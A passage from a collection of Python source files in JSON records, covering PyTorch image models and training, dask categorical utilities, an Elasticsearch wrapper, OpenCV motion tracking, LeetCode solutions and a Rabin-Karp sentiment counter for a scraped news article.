7)\n\t\t\tnn.BatchNorm2d(64),\t\t\t#这里有1d和2d的\n\t\t)\n\t\tself.fc1 = nn.Linear(32 * 7 * 7*2, 10) # fully connected layer, output 10 classes\n\t\t#self.bn1 = nn.BatchNorm1d(1024, momentum=0.5)\n\t\t#self.fc2 = nn.Linear(1024, 10)\t\t\t\t\t\t\t\t\t#拍扁之后mlp\n\t\t#self.bn2 = nn.BatchNorm1d(10, momentum=0.5)\n\t\tself.dropout=nn.Dropout(0.5)\n\tdef forward(self, x):\n\t\t\n\t\tx = self.conv1(x)\n\t\tx = self.conv2(x)\n\t\tx = x.view(x.size(0), -1) # flatten the output of conv2 to (batch_size, 32 * 7 * 7)\n\t\tx = self.dropout(x)\n\t\toutput = self.fc1(x)\n\t\t# output=self.bn1(output)\n\t\t# output = self.dropout(output)\n\t\t# output = self.fc2(output)\n\t\t# output=self.bn2(output)\n\t\t\n\t\t#torch里面的代价函数自带求softmax所以输出直接logit就好了,mse和crossentropy都是\n\t\t#output = F.softmax(x, dim=1)\n\t\treturn output # return x for visualization\n\nclass residual_block(nn.Module):\n\tdef __init__(self, in_channel, out_channel, same_shape=True):\n\t\tsuper(residual_block, self).__init__()\n\t\tself.same_shape = same_shape\n\t\tstride=1 if self.same_shape else 2\n\t\t\n\t\tself.conv1 = conv3x3(in_channel, out_channel, stride=stride)\n\t\tself.bn1 = nn.BatchNorm2d(out_channel)#outchannel或者是输出特征数(mlp)\n\t\t\n\t\tself.conv2 = conv3x3(out_channel, out_channel)\n\t\tself.bn2 = nn.BatchNorm2d(out_channel)\n\t\tif not self.same_shape:\n\t\t\tself.conv3 = nn.Conv2d(in_channel, out_channel, 1, stride=stride)\n\t\t\t#通过步长来减少一半长宽,增加一倍的channel\n\t\t\n\tdef forward(self, x):\n\t\t#经过一次3*3卷积,直接到达输出channel,长宽不变\n\t\t#如果输出比输入channel大了一倍,则步长设为2,长宽减少一半\n\t\tout = self.conv1(x)\n\t\tout = F.relu(self.bn1(out), True)\n\t\t##第一第二层间输入输出channel大小不变,则长宽不变\n\t\tout = self.conv2(out)\n\t\tout = F.relu(self.bn2(out), True)\n\t\t\n\t\t#如果下一个块channel比这层大,如64到128\n\t\t#如果汇合的时候channel不同(输入和输出channel不同的时候进入)\n\t\tif not self.same_shape:\n\t\t\tx = self.conv3(x)\n\t\treturn F.relu(x+out, True)#输入加上输出\n\t\t\nclass resnet(nn.Module):\n\tdef __init__(self, in_channel, num_classes, verbose=False):\n\t\tsuper(resnet, self).__init__()\n\t\tself.verbose = verbose\n\t\t\n\t\tself.block1 = nn.Conv2d(in_channel, 64, 7, 2)#先进行卷积\n\t\t\n\t\tself.block2 = nn.Sequential(\n\t\t\tnn.MaxPool2d(3, 2),\n\t\t\tresidual_block2(64, 64),\n\t\t\tresidual_block2(64, 64),\n\t\t\t\n\t\t)\n\t\tself.block3 = nn.Sequential(\n\t\t\tresidual_block2(64, 128, False),#前后块形状不同了\n\t\t\tresidual_block2(128, 128)\n\t\t)\n\t\tself.block4 = nn.Sequential(\n\t\t\tresidual_block2(128, 256, False),\n\t\t\tresidual_block2(256, 256)\n\t\t)\n\t\t\n\t\tself.block5 = nn.Sequential(\n\t\t\tresidual_block2(256, 512, False),\n\t\t\tresidual_block2(512, 512),\n\t\t\tnn.AvgPool2d(3)\n\t\t)\n\t\t\n\t\tself.classifier1 = nn.Linear(512, num_classes)\n\t\t# self.classifier2 = nn.Linear(512,num_classes)\n\t\t# self.classifier3 = nn.Linear(16, num_classes)\n\tdef forward(self, x):\n\t\tx = self.block1(x)\n\t\t\n\t\t# if self.verbose:\n\t\t\t# print('block 1 output: {}'.format(x.shape))\n\t\tx = self.block2(x)\n\t\t\n\t\t# if self.verbose:\n\t\t\t# print('block 2 output: {}'.format(x.shape))#32,2,2\n\t\tx = self.block3(x)\n\t\t\n\t\t# if self.verbose:\n\t\t\t# print('block 3 output: {}'.format(x.shape))\n\t\t\n\t\tx = self.block4(x)\n\t\t# if self.verbose:\n\t\t# print('block 4 output: {}'.format(x.shape))#128,256,6,6\n\t\tx = self.block5(x)\n\t\t\n\t\t# if self.verbose:\n\t\t#print('block 5 output: {}'.format(x.shape))\n\t\tx = x.view(x.shape[0], -1)#改变一下形状\n\t\t#print('这个x的大小;',x.shape)#128*2340\n\t\tlast_layer = self.classifier1(x)\n\t\t# x = self.classifier2(x)\n\t\t#output = F.softmax(last_layer, dim=1)\n\t\treturn last_layer\n\n\t\t\n\t\t\ndef conv_relu(in_channel, out_channel, kernel, stride=1, padding=0):\n\tlayer = nn.Sequential(\n\t\tnn.Conv2d(in_channel, out_channel, kernel, stride, padding),\n\t\tnn.BatchNorm2d(out_channel, eps=1e-3),\n\t\tnn.ReLU(True)\n\t)\n\treturn layer\n\t\nclass inception(nn.Module):\n\tdef __init__(self, in_channel, out1_1, out2_1, out2_3, out3_1, out3_5, out4_1):\n\t\tsuper(inception, self).__init__()\n\t\t# 第一条线路\n\t\tself.branch1x1 = conv_relu(in_channel, out1_1, 1)\n\t\t\n\t\t# 第二条线路\n\t\tself.branch3x3 = nn.Sequential( \n\t\t\tconv_relu(in_channel, out2_1, 1),\n\t\t\tconv_relu(out2_1, out2_3, 3, padding=1)\n\t\t)\n\t\t\n\t\t# 第三条线路\n\t\tself.branch5x5 = nn.Sequential(\n\t\t\tconv_relu(in_channel, out3_1, 1),\n\t\t\tconv_relu(out3_1, out3_5, 5, padding=2)\n\t\t)\n\t\t\n\t\t# 第四条线路\n\t\tself.branch_pool = nn.Sequential(\n\t\t\tnn.MaxPool2d(3, stride=1, padding=1),\n\t\t\tconv_relu(in_channel, out4_1, 1)\n\t\t)\n\t\t\n\tdef forward(self, x):\n\t\tf1 = self.branch1x1(x)\n\t\tf2 = self.branch3x3(x)\n\t\tf3 = self.branch5x5(x)\n\t\tf4 = self.branch_pool(x)\n\t\toutput = torch.cat((f1, f2, f3, f4), dim=1)\n\t\treturn output\n\nclass googlenet(nn.Module):\n\tdef __init__(self, in_channel, num_classes, verbose=False):\n\t\tsuper(googlenet, self).__init__()\n\t\tself.verbose = verbose\n\t\t\n\t\tself.block1 = nn.Sequential(\n\t\t\tconv_relu(in_channel, out_channel=64, kernel=7, stride=2, padding=3),\n\t\t\tnn.MaxPool2d(3, 2)\n\t\t)\n\t\t\n\t\tself.block2 = nn.Sequential(\n\t\t\tconv_relu(64, 64, kernel=1),\n\t\t\tconv_relu(64, 192, kernel=3, padding=1),\n\t\t\tnn.MaxPool2d(3, 2)\n\t\t)\n\t\t\n\t\tself.block3 = nn.Sequential(\n\t\t\tinception(192, 64, 96, 128, 16, 32, 32),\n\t\t\tinception(256, 128, 128, 192, 32, 96, 64),\n\t\t\tnn.MaxPool2d(3, 2)\n\t\t)\n\t\t\n\t\tself.block4 = nn.Sequential(\n\t\t\tinception(480, 192, 96, 208, 16, 48, 64),\n\t\t\tinception(512, 160, 112, 224, 24, 64, 64),\n\t\t\tinception(512, 128, 128, 256, 24, 64, 64),\n\t\t\tinception(512, 112, 144, 288, 32, 64, 64),\n\t\t\tinception(528, 256, 160, 320, 32, 128, 128),\n\t\t\tnn.MaxPool2d(3, 2)\n\t\t)\n\t\t\n\t\tself.block5 = nn.Sequential(\n\t\t\tinception(832, 256, 160, 320, 32, 128, 128),\n\t\t\tinception(832, 384, 182, 384, 48, 128, 128),\n\t\t\tnn.AvgPool2d(2)\n\t\t)\n\t\t\n\t\tself.classifier = nn.Linear(1024, num_classes)\n\t\t\n\tdef forward(self, x):\n\t\tx = self.block1(x)\n\t\tif self.verbose:\n\t\t\tprint('block 1 output: {}'.format(x.shape))\n\t\tx = self.block2(x)\n\t\tif self.verbose:\n\t\t\tprint('block 2 output: {}'.format(x.shape))\n\t\tx = self.block3(x)\n\t\tif self.verbose:\n\t\t\tprint('block 3 output: {}'.format(x.shape))\n\t\tx = self.block4(x)\n\t\tif self.verbose:\n\t\t\tprint('block 4 output: {}'.format(x.shape))\n\t\tx = self.block5(x)\n\t\tif self.verbose:\n\t\t\tprint('block 5 output: {}'.format(x.shape))\n\t\tx = x.view(x.shape[0], -1)\n\t\tx = self.classifier(x)\n\t\treturn x\n#看一下网络输入输出参数\n# test_net = inception(3, 64, 48, 64, 64, 96, 32)\n# test_x = Variable(torch.zeros(1, 3, 96, 96))\n# print('input shape: {} x {} x {}'.format(test_x.shape[1], test_x.shape[2], test_x.shape[3]))\n# test_y = test_net(test_x)\n# print('output shape: {} x {} x {}'.format(test_y.shape[1], test_y.shape[2], test_y.shape[3]))\n\n\n\n\n\n\n\n","sub_path":"1.python基础/new/my_model2.py","file_name":"my_model2.py","file_ext":"py","file_size_in_byte":8706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"319258359","text":"import os\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport cv2\nimport torch\nfrom torchvision import transforms\nfrom torch.optim.lr_scheduler import CyclicLR\nfrom torch.utils.data import DataLoader\nfrom torch import nn\nfrom sklearn.model_selection import train_test_split\n\nfrom configurations import path, img_size, train\nfrom utils import rle2mask, create_balanced_class_sampler, create_boolean_mask\nfrom dataset import ImageData\nfrom model import UNet\nfrom lr_find import lr_find\n\n# https://www.kaggle.com/c/severstal-steel-defect-detection\n\nif __name__ == '__main__':\n\n if not os.path.exists('training_process'):\n os.mkdir('training_process')\n\n use_gpu = torch.cuda.is_available()\n plot_beginning_images = False\n plot_dataloader_examples = False\n use_lr_find = False\n\n batch_size = 12\n\n tr = pd.read_csv(path + 'train.csv')\n print(len(tr))\n\n df_all = tr[tr['EncodedPixels'].notnull()].reset_index(drop=True)\n df_train, df_valid = train_test_split(df_all, random_state=42, test_size=0.1)\n\n print(len(df_train), len(df_valid))\n\n if plot_beginning_images:\n columns = 1\n rows = 4\n fig = plt.figure(figsize=(20, columns * rows + 6))\n for i in range(1, columns * rows + 1):\n fn, class_id_str = df_train['ImageId_ClassId'].iloc[i].rsplit('_', -1)\n class_id = int(class_id_str)\n fig.add_subplot(rows, columns, i).set_title(fn)\n img = cv2.imread(path + 'train_images/' + fn)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n mask = rle2mask(df_train['EncodedPixels'].iloc[i], (256, 1600))\n\n # different color codings for different classes\n if class_id == 1:\n img[mask == 1, 0] = 255\n elif class_id == 2:\n img[mask == 1, 1] = 255\n elif class_id == 3:\n img[mask == 1, 2] = 255\n else:\n img[mask == 1, 0:2] = 255\n\n plt.imshow(img)\n plt.show()\n\n # Define transformation(if needed augmentation can be applied here)\n data_transf = transforms.Compose(\n [transforms.Resize(size=(img_size, img_size)), transforms.ToTensor(),\n ])\n\n # Define data\n train_data = ImageData(df=df_train, transform=data_transf, subset='train')\n validation_data = ImageData(df=df_valid, transform=data_transf, subset='valid')\n\n # Define samplers\n train_sampler = create_balanced_class_sampler(df_train)\n validation_sampler = create_balanced_class_sampler(df_valid)\n\n # loader uses sampler\n train_loader = DataLoader(dataset=train_data, batch_size=batch_size, sampler=train_sampler, pin_memory=True)\n validation_loader = DataLoader(dataset=validation_data, batch_size=batch_size, sampler=validation_sampler, pin_memory=True)\n\n if plot_dataloader_examples:\n counts = [0, 0, 0, 0]\n\n values = next(iter(train_loader))\n for i in range(len(values[0])):\n counts[values[2][i].int() - 1] += 1\n plt.imshow(train_data[i][0].permute(1, 2, 0))\n plt.show()\n plt.imshow(np.squeeze(train_data[i][1].permute(1, 2, 0)))\n plt.show()\n print(counts)\n # Create unet model for four classes\n model = UNet(n_class=4)\n if os.path.exists('model.pth'):\n print('Model loaded')\n model.load_state_dict(torch.load('model.pth'))\n\n total_params = sum(p.numel() for p in model.parameters())\n trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(f'Total Paramaters: {total_params}, Trainable Parameters: {trainable_params}')\n\n if use_gpu:\n print('Using CUDA')\n model = model.cuda()\n\n criterion = nn.BCEWithLogitsLoss() # this is more numerically stable than applying sigmoid and using nn.BCELoss()\n lr = 0.0003 # Enter optimal base_lr found by lr_find\n lr_max = 0.003 # enter optimal max_lr fonud by lr_find\n # this only works because pytorch code is changed manually https://github.com/pytorch/pytorch/issues/19003(pytorch 1.2.0 fixes this)\n optimizer = torch.optim.Adam(model.parameters())\n\n if use_lr_find:\n lr_find(model, train_loader, optimizer, criterion, use_gpu)\n\n scheduler = CyclicLR(optimizer, lr, lr_max, cycle_momentum=False)\n\n for epoch in range(25):\n if train:\n # Training loop\n model.train()\n total_training_loss = 0.0\n for i, (data, target, class_ids) in enumerate(train_loader):\n data, target = data, target\n if use_gpu:\n data = data.cuda()\n target = target.cuda()\n\n optimizer.zero_grad()\n output = model.predict(data, use_gpu, class_ids)\n\n loss = criterion(output, target)\n loss.backward()\n\n optimizer.step()\n scheduler.step()\n total_training_loss += loss.item()\n\n img = (data[0].transpose(0, 1).transpose(1, 2).detach().cpu().numpy())\n output_mask = np.abs(create_boolean_mask(output[0][0].cpu().detach().numpy()) * (-1))\n target_mask = target[0][0].cpu().numpy().astype(np.bool)\n\n img[output_mask == 1, 0] = 1\n img[target_mask == 1, 1] = 1\n # overlapping regions look yellow\n plt.imshow(img)\n plt.savefig(f'training_process/training_{epoch}.png')\n print('Training Epoch: {} - Loss: {:.6f}'.format(epoch + 1, total_training_loss / len(df_train)))\n torch.save(model.state_dict(), 'model.pth')\n\n # Validation Loop\n model.eval()\n total_validation_loss = 0.0\n for i, (data, target, class_ids) in enumerate(validation_loader):\n data, target = data, target\n if use_gpu:\n data = data.cuda()\n target = target.cuda()\n\n optimizer.zero_grad()\n output = model.predict(data, use_gpu, class_ids)\n\n loss = criterion(output, target)\n total_validation_loss += loss.item()\n\n img = (data[0].transpose(0, 1).transpose(1, 2).detach().cpu().numpy())\n output_mask = np.abs(create_boolean_mask(output[0][0].cpu().detach().numpy()) * (-1))\n target_mask = target[0][0].cpu().numpy().astype(np.bool)\n\n img[output_mask == 1, 0] = 1\n img[target_mask == 1, 1] = 1\n\n # overlapping regions look yellow\n plt.imshow(img)\n plt.savefig(f'training_process/validation_{epoch}.png')\n print('Validation Epoch: {} - Loss: {:.6f}'.format(epoch + 1, total_validation_loss / len(df_valid)))\n","sub_path":"src.py","file_name":"src.py","file_ext":"py","file_size_in_byte":6658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"558272632","text":"from collections import defaultdict\nimport pandas as pd\nfrom toolz import partition_all\nfrom numbers import Integral\nfrom ..base import tokenize, compute_as_if_collection\nfrom .accessor import Accessor\nfrom .utils import (\n has_known_categories,\n clear_known_categories,\n is_scalar,\n is_categorical_dtype,\n)\ndef _categorize_block(df, categories, index):\n \n df = df.copy()\n for col, vals in categories.items():\n if is_categorical_dtype(df[col]):\n df[col] = df[col].cat.set_categories(vals)\n else:\n df[col] = pd.Categorical(df[col], categories=vals, ordered=False)\n if index is not None:\n if is_categorical_dtype(df.index):\n ind = df.index.set_categories(index)\n else:\n ind = pd.Categorical(df.index, categories=index, ordered=False)\n ind.name = df.index.name\n df.index = ind\n return df\ndef _get_categories(df, columns, index):\n res = {}\n for col in columns:\n x = df[col]\n if is_categorical_dtype(x):\n res[col] = pd.Series(x.cat.categories)\n else:\n res[col] = x.dropna().drop_duplicates()\n if index:\n if is_categorical_dtype(df.index):\n return res, df.index.categories\n return res, df.index.dropna().drop_duplicates()\n return res, None\ndef _get_categories_agg(parts):\n res = defaultdict(list)\n res_ind = []\n for p in parts:\n for k, v in p[0].items():\n res[k].append(v)\n res_ind.append(p[1])\n res = {k: pd.concat(v, ignore_index=True).drop_duplicates() for k, v in res.items()}\n if res_ind[0] is None:\n return res, None\n return res, res_ind[0].append(res_ind[1:]).drop_duplicates()\ndef categorize(df, columns=None, index=None, split_every=None, **kwargs):\n \n meta = df._meta\n if columns is None:\n columns = list(meta.select_dtypes([\"object\", \"category\"]).columns)\n elif is_scalar(columns):\n columns = [columns]\n # Filter out known categorical columns\n columns = [\n c\n for c in columns\n if not (is_categorical_dtype(meta[c]) and has_known_categories(meta[c]))\n ]\n if index is not False:\n if is_categorical_dtype(meta.index):\n index = not has_known_categories(meta.index)\n elif index is None:\n index = meta.index.dtype == object\n # Nothing to do\n if not len(columns) and index is False:\n return df\n if split_every is None:\n split_every = 16\n elif split_every is False:\n split_every = df.npartitions\n elif not isinstance(split_every, Integral) or split_every < 2:\n raise ValueError(\"split_every must be an integer >= 2\")\n token = tokenize(df, columns, index, split_every)\n a = \"get-categories-chunk-\" + token\n dsk = {\n (a, i): (_get_categories, key, columns, index)\n for (i, key) in enumerate(df.__dask_keys__())\n }\n prefix = \"get-categories-agg-\" + token\n k = df.npartitions\n depth = 0\n while k > split_every:\n b = prefix + str(depth)\n for part_i, inds in enumerate(partition_all(split_every, range(k))):\n dsk[(b, part_i)] = (_get_categories_agg, [(a, i) for i in inds])\n k = part_i + 1\n a = b\n depth += 1\n dsk[(prefix, 0)] = (_get_categories_agg, [(a, i) for i in range(k)])\n dsk.update(df.dask)\n # Compute the categories\n categories, index = compute_as_if_collection(type(df), dsk, (prefix, 0), **kwargs)\n # Categorize each partition\n return df.map_partitions(_categorize_block, categories, index)\nclass CategoricalAccessor(Accessor):\n \n _accessor_name = \"cat\"\n @property\n def known(self):\n \n return has_known_categories(self._series)\n def as_known(self, **kwargs):\n \n if self.known:\n return self._series\n categories = self._property_map(\"categories\").unique().compute(**kwargs)\n return self.set_categories(categories.values)\n def as_unknown(self):\n \n if not self.known:\n return self._series\n out = self._series.copy()\n out._meta = clear_known_categories(out._meta)\n return out\n @property\n def ordered(self):\n return self._delegate_property(self._series._meta, \"cat\", \"ordered\")\n @property\n def categories(self):\n \n if not self.known:\n msg = (\n \"`df.column.cat.categories` with unknown categories is not \"\n \"supported. Please use `column.cat.as_known()` or \"\n \"`df.categorize()` beforehand to ensure known categories\"\n )\n raise NotImplementedError(msg)\n return self._delegate_property(self._series._meta, \"cat\", \"categories\")\n @property\n def codes(self):\n \n if not self.known:\n msg = (\n \"`df.column.cat.codes` with unknown categories is not \"\n \"supported. Please use `column.cat.as_known()` or \"\n \"`df.categorize()` beforehand to ensure known categories\"\n )\n raise NotImplementedError(msg)\n return self._property_map(\"codes\")\n def remove_unused_categories(self):\n \n # get the set of used categories\n present = self._series.dropna().unique()\n present = pd.Index(present.compute())\n if isinstance(self._series._meta, pd.CategoricalIndex):\n meta_cat = self._series._meta\n else:\n meta_cat = self._series._meta.cat\n # Reorder to keep cat:code relationship, filtering unused (-1)\n ordered, mask = present.reindex(meta_cat.categories)\n if mask is None:\n # PANDAS-23963: old and new categories match.\n return self._series\n new_categories = ordered[mask != -1]\n meta = meta_cat.set_categories(new_categories, ordered=meta_cat.ordered)\n return self._series.map_partitions(\n self._delegate_method,\n \"cat\",\n \"set_categories\",\n (),\n {\"new_categories\": new_categories},\n meta=meta,\n token=\"cat-set_categories\",\n )\n","sub_path":"dask/dataframe/categorical.py_no_comments.py","file_name":"categorical.py_no_comments.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"583815138","text":"import esprit\nfrom esprit import mappings\nfrom octopus.core import app\nimport json as jsonlib\n\nclass ESDAO(esprit.dao.DomainObject):\n __type__ = 'index'\n __conn__ = esprit.raw.Connection(app.config.get('ELASTIC_SEARCH_HOST'), app.config.get('ELASTIC_SEARCH_INDEX'))\n\n @classmethod\n def mappings(cls):\n return {\n cls.__type__ : mappings.for_type(\n cls.__type__,\n mappings.properties(mappings.type_mapping(\"location\", \"geo_point\")),\n mappings.dynamic_templates(\n [\n mappings.EXACT,\n ]\n )\n )\n }\n\n def json(self):\n return jsonlib.dumps(self.data)\n\n def prep(self):\n pass\n\n def save(self, **kwargs):\n self.prep()\n super(ESDAO, self).save(**kwargs)\n\n","sub_path":"octopus/modules/es/dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"354489549","text":"import numpy as np\nimport cv2\n\n\ndef centerOfMass(frame):\n cx = 0\n cy = 0\n count = 0\n for y in range(frame.shape[0]):\n for x in range(frame.shape[1]):\n if frame[y, x] == 255:\n cx += x\n cy += y\n count += 1\n\n if count > 0:\n return (int(cx / count), int(cy / count))\n else:\n return (-1, -1)\n\ncap = cv2.VideoCapture('Micro-dance_2_.avi')\nframeCount = 0\nwhile cap.isOpened():\n ret, frame = cap.read()\n if ret == False:\n break\n # Frame in Graustufen wandeln: cvtColor()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # 1. Frame merken\n if frameCount == 0:\n firstFrame = gray\n frameCount += 1\n # Betrag der Differenz berechnen: absDiff()\n absDiff = cv2.absdiff(gray, firstFrame)\n # Schwellwertbildung\n thresh = 40\n ret, mask = cv2.threshold(absDiff, thresh, 255, cv2.THRESH_BINARY)\n\n # Schwerpunkt bestimmen\n #(cx, cy) = centerOfMass(mask)\n M = cv2.moments(mask)\n if M[\"m00\"]:\n cx = int(M[\"m10\"]/M[\"m00\"])\n cy = int(M[\"m01\"]/M[\"m00\"])\n # Schwerpunkt zeichnen\n cv2.circle(frame, (cx, cy), 5, (0,0,255), cv2.FILLED)\n\n # Anwendung:\n # Vordergrund vor einen anderen Hintergrund setzen\n\n cv2.imshow(\"Video\", frame)\n if cv2.waitKey(30) != -1:\n break\ncap.release()\ncv2.destroyAllWindows()","sub_path":"3. Woche/background_subtraction.py","file_name":"background_subtraction.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"419826521","text":"from django.conf.urls import url, include\nfrom . import views\n\napp_name = 'facebook_albums'\n\n\narticle_patterns = [\n url(r'^$', view=views.all_albums, name='landing'),\n url(r'^(?P[0-9]+)/$', view=views.one_album, name='album'),\n]\n\nurlpatterns = [url(r'^', include(article_patterns, namespace=app_name))]\n","sub_path":"navitas/facebook_albums/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"611181738","text":"# sliding window, prefix sum: o(n) time and o(1) space\n# we scan from left to right, \"total\" tracks the \n# sum of the subarray. If the sum is less than s,\n# right moves forward one step, else left moves forward\n# one step, left and right form a window.\nclass Solution(object):\n def minSubArrayLen(self, target, nums):\n \"\"\"\n :type target: int\n :type nums: List[int]\n :rtype: int\n \"\"\"\n total = left = right = 0\n res = len(nums) + 1\n while right < len(nums):\n total += nums[right]\n while total >= target:\n res = min(res, right-left+1)\n total -= nums[left]\n left += 1\n right += 1\n return res if res <= len(nums) else 0\n# Runtime: 62 ms, faster than 69.46% of Python online submissions for Minimum Size Subarray Sum.\n# Memory Usage: 15.4 MB, less than 79.34% of Python online submissions for Minimum Size Subarray Sum.\n\n# sliding window, prefix sum: o(n) time and space\nclass Solution(object):\n def minSubArrayLen(self, target, nums):\n \"\"\"\n :type target: int\n :type nums: List[int]\n :rtype: int\n \"\"\"\n ans = len(nums)+1\n pref = [0]\n for num in nums:\n pref.append(pref[-1]+num)\n p1,p2 = 0,1\n while p2 < len(pref):\n if pref[p2]-pref[p1] < target:\n p2 += 1\n else:\n ans = min(ans, p2-p1)\n p1 += 1\n if ans < len(nums)+1:\n return ans\n else:\n return 0\n# Runtime: 76 ms, faster than 55.39% of Python online submissions for Minimum Size Subarray Sum.\n# Memory Usage: 15.5 MB, less than 23.65% of Python online submissions for Minimum Size Subarray Sum.\n","sub_path":"209. Minimum Size Subarray Sum.py","file_name":"209. Minimum Size Subarray Sum.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"328582044","text":"import plotly\r\nimport bs4\r\nfrom urllib.request import urlopen as uReq\r\nfrom urllib.request import Request, urlopen\r\nfrom bs4 import BeautifulSoup as soup\r\n\r\nreq = Request('http://www.nst.com.my/opinion/columnists/2018/05/365668/malaysia', headers={'User-Agent': 'Mozilla/5.0'})\r\nwebpage = urlopen(req).read()\r\n\r\npage_soup = soup(webpage, 'html.parser')\r\n\r\n[s.extract() for s in page_soup(['style', 'script', '[document]', 'head', 'title'])]\r\n\r\narticle = page_soup.getText()\r\n\r\nprint(article)\r\n# d is the number of characters in input alphabet\r\nd = 256\r\nnewText = \"\"\r\npositive = 0\r\nnegative = 0\r\n\r\n# pat -> pattern\r\n# txt -> text\r\n# q -> A prime number\r\n\r\ndef filter(pat, txt, q):\r\n for r in range(len(pat)-1, -1, -1):\r\n global newText\r\n M = len(pat[r])\r\n N = len(txt)\r\n i = 0\r\n j = 0\r\n p = 0 # hash value for pattern\r\n t = 0 # hash value for txt\r\n h = 1\r\n k = 0\r\n cond = False\r\n\r\n if M > N:\r\n return -1\r\n if pat[r] == None or txt == None:\r\n return -1\r\n if pat[r] == \"\" or txt == \"\":\r\n return -1\r\n\r\n # The value of h would be \"pow(d, M-1)%q\"\r\n for i in range(M - 1):\r\n h = (h * d) % q\r\n\r\n # Calculate the hash value of pattern and first window\r\n # of text\r\n for i in range(M):\r\n p = (d * p + ord(pat[r][i].lower())) % q\r\n t = (d * t + ord(txt[i].lower())) % q\r\n\r\n # Slide the pattern over text one by one\r\n for i in range(N - M + 1):\r\n # Check the hash values of current window of text and\r\n # pattern if the hash values match then only check\r\n # for characters on by one\r\n if p == t:\r\n # Check for characters one by one\r\n for j in range(M):\r\n if txt[i + j].lower() != pat[r][j].lower():\r\n break\r\n j += 1\r\n # if p == t and pat[0...M-1] = txt[i, i+1, ...i+M-1]\r\n if j == M:\r\n newText = txt[0:i] + txt[i + M - 1: N]\r\n txt = newText\r\n cond = True\r\n N = (N+1)-M\r\n\r\n # Calculate hash value for next window of text: Remove\r\n # leading digit, add trailing digit\r\n if i < N - M:\r\n t = (d * (t - ord(txt[i].lower()) * h) + ord(txt[i + M].lower())) % q\r\n # We might get negative values of t, converting it to\r\n # positive\r\n if t < 0:\r\n t = t + q\r\n if i >= N-M:\r\n if cond == False:\r\n del pat[r]\r\n\r\n\r\ndef compare(pat, txt, q, sentiment):\r\n M = len(pat)\r\n N = len(txt)\r\n i = 0\r\n j = 0\r\n p = 0 # hash value for pattern\r\n t = 0 # hash value for txt\r\n h = 1\r\n global positive\r\n global negative\r\n\r\n if M > N:\r\n return -1\r\n if pat == None or txt == None:\r\n return -1\r\n if pat == \"\" or txt == \"\":\r\n return -1\r\n\r\n\r\n # The value of h would be \"pow(d, M-1)%q\"\r\n for i in range(M - 1):\r\n h = (h * d) % q\r\n\r\n # Calculate the hash value of pattern and first window\r\n # of text\r\n for i in range(M):\r\n p = (d * p + ord(pat[i].lower())) % q\r\n t = (d * t + ord(txt[i].lower())) % q\r\n\r\n # Slide the pattern over text one by one\r\n for i in range(N - M + 1):\r\n # Check the hash values of current window of text and\r\n # pattern if the hash values match then only check\r\n # for characters on by one\r\n if p == t:\r\n # Check for characters one by one\r\n for j in range(M):\r\n if txt[i + j].lower() != pat[j].lower():\r\n break\r\n\r\n j += 1\r\n # if p == t and pat[0...M-1] = txt[i, i+1, ...i+M-1]\r\n if j == M:\r\n print(\"Pattern found starting from index: \" + str(i))\r\n print(\"Pattern matched: \" + str(pat))\r\n if sentiment == True:\r\n positive += 1\r\n if sentiment == False:\r\n negative += 1\r\n # Calculate hash value for next window of text: Remove\r\n # leading digit, add trailing digit\r\n if i < N - M:\r\n t = (d * (t - ord(txt[i].lower()) * h) + ord(txt[i + M].lower())) % q\r\n\r\n # We might get negative values of t, converting it to\r\n # positive\r\n if t < 0:\r\n t = t + q\r\n\r\n\r\ntxt = ' ' + article + ' '\r\n\r\nstopWords = \"a about above after again against all am an and any are aren't as at be because been before being below between both but by can't cannot could couldn't did didn't do does doesn't doing don't down during each few for from further had hadn't has hasn't have haven't having he he'd he'll he's her here here's hers herself him himself his how how's i i'd i'll i'm i've if in into is isn't it it's its itself let's me more most mustn't my myself no nor not of off on once only or other ought our ours ourselves out over own same shan't she she'd she'll she's should shouldn't so some such than that that's the their theirs them themselves then there there's these they they'd they'll they're they've this those through to too under until up very was wasn't we we'd we'll we're we've were weren't what what's when when's where where's which while who who's whom why why's with won't would wouldn't you you'd you'll you're you've your yours yourself yourselves\"\r\nstopWords = stopWords.split()\r\nprint(stopWords)\r\nq = 977 # A prime number\r\n\r\nfor o in range(len(stopWords)):\r\n stopWords[o] = stopWords[o].replace(stopWords[o], ' ' + stopWords[o] + ' ')\r\n\r\nfor l in range(len(stopWords)):\r\n filter(stopWords, txt, q)\r\n txt = newText\r\nprint()\r\nprint()\r\n\r\n\r\nprint(\"POSITIVE:\")\r\nwith open('C:/Users/ASUS/PycharmProjects/karp/positive.txt', 'r') as f:\r\n for line in f:\r\n line = line.replace('–', '')\r\n for word in line.split():\r\n word = word.replace(',', '')\r\n word = word.replace(word, ' '+word+' ')\r\n compare(word, newText, q, True)\r\nprint()\r\n\r\n\r\nprint(\"NEGATIVE:\")\r\nwith open('C:/Users/ASUS/PycharmProjects/karp/negative.txt', 'r') as w:\r\n for line in w:\r\n line = line.replace('–', '')\r\n for word in line.split():\r\n word = word.replace(',', '')\r\n word = word.replace(word, ' '+word+' ')\r\n compare(word, newText, q, False)\r\nprint()\r\nprint()\r\n\r\nprint(\"Positive words count: \"+ str(positive))\r\nprint(\"Negative words count: \"+ str(negative))\r\nprint(\"Text after filtering stop words: \"+ '\"'+newText.strip()+'\"')\r\n\r\nsent = (positive + negative) * (15 / 100)\r\n\r\nprint(str(sent))\r\n\r\nif positive-sent > negative:\r\n print(\"Article sentiment is positive!\")\r\nelif negative-sent 